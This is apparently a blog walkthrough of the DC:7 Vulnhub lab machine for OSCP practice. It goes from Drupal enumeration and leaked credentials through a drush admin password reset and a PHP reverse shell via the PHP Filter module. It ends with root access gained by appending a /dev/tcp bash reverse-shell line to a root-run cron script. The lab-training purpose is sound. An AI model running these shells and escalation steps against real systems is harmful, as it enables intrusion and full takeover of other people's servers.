This is the DC:7 Vulnhub walkthrough. There are many VMs to choose from on vulnhub.com so it can be a daunting task to choose one. Studying for the OSCP exam narrows the criteria for a favorable VM to practice on even further. For those that don’t know already you are prohibited from using Metasploit during the exam except for on one host. That means it is a good idea to practice not needing to use it.
Woah woah DC 7, haven’t done DC 1 yet? Read the tutorial DC-1 Vulnhub Walkthrough: Docker & Drupal now!
Given this criteria you can narrow the search down a bit, but referenced VMs from advanced ethical hackers is still your best bet. The DC 7 VM is one of several in order starting with DC 1. My opinion is that this VM is a great VM for learning and practicing Linux privilege escalation. Enjoy!
Table of Contents
Here’s What You Need
- Kali Linux Virtual Machine ( VirtualBox )
- DC:7 Virtual Machine ( VirtualBox )
Exploit Toolbelt
- https://github.com/alem0lars/docker-droopescan
Privilege Escalation Toolbelt
- https://github.com/rebootuser/LinEnum
- https://github.com/diego-treitos/linux-smart-enumeration/blob/master/lse.sh
DC:7 Vulnhub Walkthrough
Enumeration
My first enumeration I do by AutoRecon and nmap. The results come in and identify a few running services. A look at the web service shows that Drupal, the CMS software, is running. Drupal only holds a very small portion of the market share for CMS software, but it is commonly used to demonstrate web exploitation techniques.
To scan the Drupal site I use droopescan. I prefer to use the dockerized container version of droopescan.
To install droopescan follow these steps below.
git clone https://github.com/droope/droopescan.git
cd droopescan
# restart the docker service
$ service docker restart
# build and tag the image as droope/droopescan
$ docker build -t droope/droopescan .docker run --rm droope/droopescan scan drupal -u http://10.0.0.187
[+] Possible version(s):
8.7.0
8.7.0-alpha1
8.7.0-alpha2
8.7.0-beta1
8.7.0-beta2
8.7.0-rc1
8.7.1
8.7.2
8.7.3
[+] Possible interesting urls found:
Default admin - http://10.0.0.187/user/loginI go ahead and try my exploit I used before against the running Drupal in DC 2, however it fails.
python 34992.py -t http://10.0.0.187 -u guru -p password
NOT VULNERABLE :(
Have a look at the Twitter page for DC7-User.
The text at the end of the page says @DC7USER finally a clue! Looking at the Twitter page of DC7USER https://twitter.com/dc7user?lang=en I see there is a link for a GitHub this must be investigated further. There is only one repository and as many know CMS exploits commonly exploit credentials stored in config.php files. This is the case for DC7 as we see there is a username and password stored in cleartext, great!
DC:7 Vulnhub Walkthrough – SSH
Remember that the running services are ssh and http.
# ssh to DC 7 as the new user found - dc7user : MdR3xOgB7#dW
ssh [email protected]So I have a username and a password what to do with them now?
Logging into the box as dc7user I take a look around and notice the permissions for the directory listing. There is one that has read-write for all users a file named mbox.
So I cat the contents of mbox and discover there is system mail with some interesting contents. It looks like a mail about a cronjob that has run. There is always the possibility of abusing cronjob for privilege escalation so I explore further.
The contents of the backups.sh file detail some commands that have run. The most interesting of which is drush.
DC:7 Vulnhub Walkthrough – Drush
A Google search shows that the Drush command is related to Drupal and is a CLI utility that can be used to change the administrator password. Nice!
drush user-password admin --password=password
So I now login as admin with the password being “password” and guess what? It works.
Just like how WordPress is commonly exploited by running PHP code on the webserver so to is the case here. There is one difference with Drupal and that is there is an extra step required. To allow PHP to execute you have to install the PHP Filter module.
Go to drupal.org/project/php to get the tar.gz file for the module and then upload the file on the Drupal site as admin.
A successful installation will display an update on authorize.php. Now follow the link to enable newly added modules.
You will click the check mark on the box to the left of the PHP Filter module found by scrolling towards the end of the page.
Make sure to hit the Install button located on the end of the page. Successfully installing the new module will redirect to a new page with a success message.
Module PHP Filter has been enabled.The next step is to embed the code for a reverse shell in the Drupal site by creating a new page and previewing in the web interface.
Content > Add content > Basic page > Save as PHP Code format
The webshell I am using is one from pentestmonkey.com and is conveniently located by default in the Kali Linux directory /usr/share/webshells/php-reverse-shell.php use this one as well.
Choosing the Preview button will execute the embedded PHP code. With a netcat listener open to the port we defined in the PHP webshell one step ago a new shell is opened!
DC:7 Vulnhub Walkthrough
Linux Privilege Escalation
With a shell now on the box I need to do one thing, escalate privileges to root. But first things first let’s enhance the shell that I do have already by upgrading to a Python TTY shell ( teletypewriter shell ).
python -c 'import pty; pty.spawn("/bin/bash")' One possible avenue we can explore is a kernel exploit. However the results for researching exploits for this kernel version are not so useful so I will proceed with a different route.
uname -a
Linux dc-7 4.9.0-9-amd64 #1 SMP Debian 4.9.168-1+deb9u5 (2019-08-11) x86_64 GNU/LinuxThis information is confirmed by the two enumeration scripts I run.
# kernel info is confirmed by linenum.sh output
### SYSTEM ##############################################
[-] Kernel information:
Linux dc-7 4.9.0-9-amd64 #1 SMP Debian 4.9.168-1+deb9u5 (2019-08-11) x86_64 GNU/LinuxAt this point I realize I need to actually power off my Kali Linux VM and add a Bridged or NAT network adapter. Once I do that I can easily get the connection to work.
That is lse.sh or “smart Linux enumeration script”.
wget http://10.0.0.44:8000/lse.shAnd LinEnum.
wget http://10.0.0.44:8000/linenum.shroot@kali:~# nc -lvp 443
listening on [any] 443 ...
10.0.0.187: inverse host lookup failed: Unknown host
connect to [10.0.0.44] from (UNKNOWN) [10.0.0.187] 59834
Linux dc-7 4.9.0-9-amd64 #1 SMP Debian 4.9.168-1+deb9u5 (2019-08-11) x86_64 GNU/Linux
08:14:07 up 6 min, 0 users, load average: 0.09, 0.08, 0.03
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ python -c 'import pty; pty.spawn("/bin/bash")'
www-data@dc-7:/$ whoami
whoami
www-data
www-data@dc-7:/$ sudo -l
sudo -l
bash: sudo: command not found
www-data@dc-7:/$ ps | grep root
ps | grep root
www-data@dc-7:/$ ps
ps
PID TTY TIME CMD
834 pts/0 00:00:00 bash
839 pts/0 00:00:00 ps
www-data@dc-7:/$ ls
ls
bin etc initrd.img.old lost+found opt run sys var
boot home lib media proc sbin tmp vmlinuz
dev initrd.img lib64 mnt root srv usr vmlinuz.old
www-data@dc-7:/$ wget http://10.0.0.44/linenum.sh
wget http://10.0.0.44/linenum.sh
--2019-09-21 08:18:14-- http://10.0.0.44/linenum.sh
Connecting to 10.0.0.44:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 45652 (45K) [text/x-sh]
linenum.sh: Permission denied
Cannot write to 'linenum.sh' (Permission denied).
www-data@dc-7:/$ cd /tmp/var
cd /tmp/var
bash: cd: /tmp/var: No such file or directory
www-data@dc-7:/$ cd /var/tmp
cd /var/tmp
www-data@dc-7:/var/tmp$ wget http://10.0.0.44/linenum.sh
wget http://10.0.0.44/linenum.sh
--2019-09-21 08:18:30-- http://10.0.0.44/linenum.sh
Connecting to 10.0.0.44:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 45652 (45K) [text/x-sh]
Saving to: 'linenum.sh'
linenum.sh 100%[===================>] 44.58K --.-KB/s in 0s
2019-09-21 08:18:31 (93.7 MB/s) - 'linenum.sh' saved [45652/45652]
www-data@dc-7:/var/tmp$ chmod u+x linenum.sh
chmod u+x linenum.sh
www-data@dc-7:/var/tmp$ ./linenum.sh
None of the SUID files are exploitable unfortunately.
[-] SUID files:
-rwsr-xr-x 1 root root 40536 May 17 2017 /bin/su
-rwsr-xr-x 1 root root 61240 Nov 10 2016 /bin/ping
-rwsr-xr-x 1 root root 31720 Mar 8 2018 /bin/umount
-rwsr-xr-x 1 root root 44304 Mar 8 2018 /bin/mount
-rwsr-xr-x 1 root root 1019656 Jul 20 21:32 /usr/sbin/exim4
-rwsr-xr-x 1 root root 440728 Mar 2 2019 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 10232 Mar 28 2017 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-- 1 root messagebus 42992 Jun 10 07:42 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 59680 May 17 2017 /usr/bin/passwd
-rwsr-xr-x 1 root root 40504 May 17 2017 /usr/bin/chsh
-rwsr-xr-x 1 root root 75792 May 17 2017 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 50040 May 17 2017 /usr/bin/chfn
-rwsr-xr-x 1 root root 40312 May 17 2017 /usr/bin/newgrp
Enumeration is key! That is why just for fun I also run the lse.sh or smart enumeration script to see what we can find out about the box.
www-data@dc-7:/var/tmp$ ./lse.sh
./lse.sh
---
If you know the current user password, write it here for better results: www-data
www-data
---
User: www-data
User ID: 33
Password: ******
Home: /var/www
Path: /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
umask: 0000
Hostname: dc-7
Linux: 4.9.0-9-amd64
Distribution: Debian GNU/Linux 9.9 (stretch)
Architecture: x86_64
==================================================================( users )=====
[i] usr000 Current user groups............................................. yes!
[*] usr010 Is current user in an administrative group?..................... nope
[*] usr020 Are there other users in an administrative groups?.............. nope
[*] usr030 Other users with shell.......................................... yes!
[i] usr040 Environment information......................................... skip
[i] usr050 Groups for other users.......................................... skip
[i] usr060 Other users..................................................... skip
===================================================================( sudo )=====
[!] sud000 Can we sudo without a password?................................. nope
[!] sud010 Can we list sudo commands without a password?................... nope
[!] sud020 Can we sudo with a password?.................................... nope
[!] sud030 Can we list sudo commands with a password?...................... nope
[*] sud040 Can we read /etc/sudoers?....................................... nope
[*] sud050 Do we know if any other users used sudo?........................ nope
============================================================( file system )=====
[*] fst000 Writable files outside user's home.............................. nope
[*] fst010 Binaries with setuid bit........................................ yes!
[!] fst020 Uncommon setuid binaries........................................ nope
[!] fst030 Can we write to any setuid binary?.............................. nope
[*] fst040 Binaries with setgid bit........................................ skip
[!] fst050 Uncommon setgid binaries........................................ skip
[!] fst060 Can we write to any setgid binary?.............................. skip
[*] fst070 Can we read /root?.............................................. nope
[*] fst080 Can we read subdirectories under /home?......................... yes!
[*] fst090 SSH files in home directories................................... nope
[*] fst100 Useful binaries................................................. yes!
[*] fst110 Other interesting files in home directories..................... nope
[!] fst120 Are there any credentials in fstab/mtab?........................ nope
[*] fst130 Does 'www-data' have mail?...................................... nope
[!] fst140 Can we access other users mail?................................. nope
[*] fst150 Looking for GIT/SVN repositories................................ nope
[i] fst500 Files owned by user 'www-data'.................................. skip
[i] fst510 SSH files anywhere.............................................. skip
[i] fst520 Check hosts.equiv file and its contents......................... skip
[i] fst530 List NFS server shares.......................................... skip
[i] fst540 Dump fstab file................................................. skip
=================================================================( system )=====
[i] sys000 Who is logged in................................................ skip
[i] sys010 Last logged in users............................................ skip
[!] sys020 Does the /etc/passwd have hashes?............................... nope
[!] sys030 Can we read /etc/shadow file?................................... nope
[!] sys030 Can we read /etc/shadow- file?.................................. nope
[!] sys030 Can we read /etc/shadow~ file?.................................. nope
[!] sys030 Can we read /etc/master.passwd file?............................ nope
[*] sys040 Check for other superuser accounts.............................. nope
[*] sys050 Can root user log in via SSH?................................... nope
[i] sys060 List available shells........................................... skip
[i] sys070 System umask in /etc/login.defs................................. skip
[i] sys080 System password policies in /etc/login.defs..................... skip
===============================================================( security )=====
[*] sec000 Is SELinux present?............................................. nope
[*] sec010 List files with capabilities.................................... nope
[!] sec020 Can we write to a binary with caps?............................. nope
[!] sec030 Do we have all caps in any binary?.............................. nope
[*] sec040 Users with associated capabilities.............................. nope
[!] sec050 Does current user have capabilities?............................ skip
========================================================( recurrent tasks )=====
[*] ret000 User crontab.................................................... nope
[!] ret010 Cron tasks writable by user..................................... nope
[*] ret020 Cron jobs....................................................... yes!
[*] ret030 Can we read user crontabs....................................... nope
[*] ret040 Can we list other user cron tasks?.............................. nope
[!] ret050 Can we write to executable paths present in cron jobs........... skip
[*] ret060 Can we write to any paths present in cron jobs.................. skip
[i] ret400 Cron files...................................................... skip
[*] ret500 User systemd timers............................................. nope
[!] ret510 Can we write in any system timer?............................... skip
[i] ret900 Systemd timers.................................................. skip
================================================================( network )=====
[*] net000 Services listening only on localhost............................ yes!
[!] net010 Can we sniff traffic with tcpdump?.............................. nope
[i] net500 NIC and IP information.......................................... skip
[i] net510 Routing table................................................... skip
[i] net520 ARP table....................................................... skip
[i] net530 Namerservers.................................................... skip
[i] net540 Systemd Nameservers............................................. skip
[i] net550 Listening TCP................................................... skip
[i] net560 Listening UDP................................................... skip
===============================================================( services )=====
[!] srv000 Can we write in service files?.................................. skip
[!] srv010 Can we write in binaries executed by services?.................. nope
[*] srv020 Files in /etc/init.d/ not belonging to root..................... nope
[*] srv030 Files in /etc/rc.d/init.d not belonging to root................. nope
[*] srv040 Upstart files not belonging to root............................. nope
[*] srv050 Files in /usr/local/etc/rc.d not belonging to root.............. nope
[i] srv400 Contents of /etc/inetd.conf..................................... skip
[i] srv410 Contents of /etc/xinetd.conf.................................... skip
[i] srv420 List /etc/xinetd.d if used...................................... skip
[i] srv430 List /etc/init.d/ permissions................................... skip
[i] srv440 List /etc/rc.d/init.d permissions............................... skip
[i] srv450 List /usr/local/etc/rc.d permissions............................ skip
[i] srv460 List /etc/init/ permissions..................................... skip
[!] srv500 Can we write in systemd service files?.......................... skip
[!] srv510 Can we write in binaries executed by systemd services?.......... nope
[*] srv520 Systemd files not belonging to root............................. nope
[i] srv900 Systemd config files permissions................................ skip
==============================================================( processes )=====
[!] pro000 Can we write in any process binary?............................. nope
[*] pro010 Processes running with root permissions......................... yes!
[i] pro500 Running processes............................................... skip
[i] pro510 Running process binaries and permissions........................ skip
===============================================================( software )=====
[!] sof000 Can we connect to MySQL with root/root credentials?............. nope
[!] sof010 Can we connect to MySQL as root without password?............... nope
[!] sof020 Can we connect to PostgreSQL template0 as postgres and no pass?. nope
[!] sof020 Can we connect to PostgreSQL template1 as postgres and no pass?. nope
[!] sof020 Can we connect to PostgreSQL template0 as psql and no pass?..... nope
[!] sof020 Can we connect to PostgreSQL template1 as psql and no pass?..... nope
[*] sof030 Installed apache modules........................................ yes!
[!] sof040 Found any .htpasswd files?...................................... nope
[i] sof500 Sudo version.................................................... skip
[i] sof510 MySQL version................................................... skip
[i] sof520 Postgres version................................................ skip
[i] sof530 Apache version.................................................. skip
=============================================================( containers )=====
[*] ctn000 Are we in a docker container?................................... nope
[*] ctn010 Is docker available?............................................ nope
[!] ctn020 Is the user a member of the 'docker' group?..................... nope
[*] ctn200 Are we in a lxc container?...................................... nope
[!] ctn210 Is the user a member of any lxc/lxd group?...................... nope
==================================( FINISHED )==================================
The output of the two Linux privilege escalation scripts is good but ultimately fruitless. Looking back at our findings from the initial enumeration it looks like it is time once again to look at the backups.sh script for help. Let’s check the ownership of that file. Turns out it belongs to root!
www-data@dc-7:/var/tmp$ cd /opt
cd /opt
www-data@dc-7:/opt$ cd scripts
cd scripts
www-data@dc-7:/opt/scripts$ ls
ls
backups.sh
www-data@dc-7:/opt/scripts$ ls -al
ls -al
total 12
drwxr-xr-x 2 root www-data 4096 Aug 29 23:02 .
drwxr-xr-x 3 root root 4096 Aug 29 13:59 ..
-rwxrwxr-x 1 root www-data 520 Aug 29 23:02 backups.sh
www-data@dc-7:/opt/scripts$
So at this point we need to generate some bash code to execute yet another reverse shell. In this way we exploit the privileges of the backups.sh script in order to escalate to root privileges. Since the script’s owner is root that means when it is executed it will be run as root.
From redteamtutorials.com – Bash Unix Reverse Shell
msfvenom -p cmd/unix/reverse_bash LHOST=<Local IP Address> LPORT=<Local Port> -f raw > shell.sh
root@kali:~# msfvenom -p cmd/unix/reverse_bash LHOST=10.0.0.44 LPORT=4444 -f raw
[-] No platform was selected, choosing Msf::Module::Platform::Unix from the payload
[-] No arch selected, selecting arch: cmd from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 63 bytes
0<&198-;exec 198<>/dev/tcp/10.0.0.44/4444;sh <&198 >&198 2>&198To reiterate we are generating code in bash to replace the bash code in the existing backup.sh script so that we can spawn a new reverse shell connection.
echo "0<&198-;exec 198<>/dev/tcp/10.0.0.44/4444;sh <&198 >&198 2>&198" >> backups.shNow I can paste the full command into my original reverse shell to reap our next shell.
nc -lvp 4444
listening on [any] 4444 ...
10.0.0.187: inverse host lookup failed: Unknown host
connect to [10.0.0.44] from (UNKNOWN) [10.0.0.187] 54214
python -c 'import pty; pty.spawn("/bin/bash")'
root@dc-7:/var/www# whoami
whoami
root
root@dc-7:/var/www# cd /root
cd /root
root@dc-7:~# ls
ls
theflag.txt
root@dc-7:~# cat theflag.txt
cat theflag.txtPretty standard here read the final flag and you’re done!
And there you have it that’s the DC 7 Vulnhub walkthrough.